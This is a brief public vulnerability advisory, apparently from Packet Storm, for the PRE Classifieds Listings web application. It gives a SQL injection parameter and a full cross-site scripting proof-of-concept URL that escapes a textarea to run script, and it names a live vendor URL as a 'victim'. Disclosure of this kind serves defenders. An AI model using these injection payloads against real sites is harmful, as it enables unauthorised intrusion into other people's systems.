Pre Classifieds Listings suffers from cross site scripting and remote SQL injection vulnerabilities.
df3731612f0239d3680ed1b0c46f4dbcbd2ad2bc43849d7a0ef5ed9efabee6ae#########################################################
---------------------------------------------------------
Portal Name: PRE Classifieds Listings
Vendor : http://www.preproject.com/
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (SQL,XSS)
---------------------------------------------------------
#########################################################
[SQL]:
http://site.com/[Path]/home/detailad.asp?siteid=[SQL]
[XSS]:
http://site.com/[Path]/home/signup.asp?full_name=pouya.s3rver@gmail.com&email=111-222-1933email@address.tst&pass=111-222-1933email@address.tst&address=</textarea><ScRiPt%20%0a%0d>alert(1369)%3B</ScRiPt>&phone=111-222-1933email@address.com&state=0&hide_email=on&url_add=111-222-1933email@address.tst&Submit=SignUp&addit=start
---------------------------------
Victem :
http://preproject.com/pclasp/
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed